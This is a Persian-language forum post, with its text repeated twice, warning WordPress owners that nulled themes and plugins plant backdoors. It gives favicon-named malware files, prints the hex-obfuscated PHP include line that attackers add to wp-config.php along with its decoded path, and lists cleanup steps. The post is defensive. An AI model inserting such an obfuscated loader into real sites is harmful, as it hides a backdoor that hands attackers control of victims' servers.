sazsaz
December 11th, 2017, 23:17
هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی
قبلا چندین بار هشدار دادیم و کسی توجه نکرد
متاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهند
عزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنید
هکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .
- چند مدیریت برای خویش فعال می کنند
- با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )
فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.
من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .
favicon_3a0642.ico
favicon_993c6a.ico
حالا با آن دسترسی ها همه جا را ویرایش و خراب می کنند
در فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنند
@include "\x2fh\x6fm\x65/\x6ea\x67h\x61s\x68y\x2fp\x75b\x6ci\x63_\x68t\x6dl \x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x399\x33c\x36a\x2ei\x63o";
که دیکد آن چنین می شود
@include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";
حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند .....
حال چطور این طور سایت ها را رفع مشکل کنیم
1- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم
2- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم
3- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم
4- سطح فایل کانفیگ را 444 قرار می دهیم
5- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم
6- بر روی پوشه مدیریت پسورد می گذاریم
7- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.
برگرفته شده از انجمن وردپرس ایرانی (http://wpir.ir/thread63.html)
قبلا چندین بار هشدار دادیم و کسی توجه نکرد
متاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهند
عزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنید
هکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .
- چند مدیریت برای خویش فعال می کنند
- با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )
فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.
من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .
favicon_3a0642.ico
favicon_993c6a.ico
حالا با آن دسترسی ها همه جا را ویرایش و خراب می کنند
در فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنند
@include "\x2fh\x6fm\x65/\x6ea\x67h\x61s\x68y\x2fp\x75b\x6ci\x63_\x68t\x6dl \x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x399\x33c\x36a\x2ei\x63o";
که دیکد آن چنین می شود
@include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";
حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند .....
حال چطور این طور سایت ها را رفع مشکل کنیم
1- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم
2- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم
3- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم
4- سطح فایل کانفیگ را 444 قرار می دهیم
5- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم
6- بر روی پوشه مدیریت پسورد می گذاریم
7- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.
برگرفته شده از انجمن وردپرس ایرانی (http://wpir.ir/thread63.html)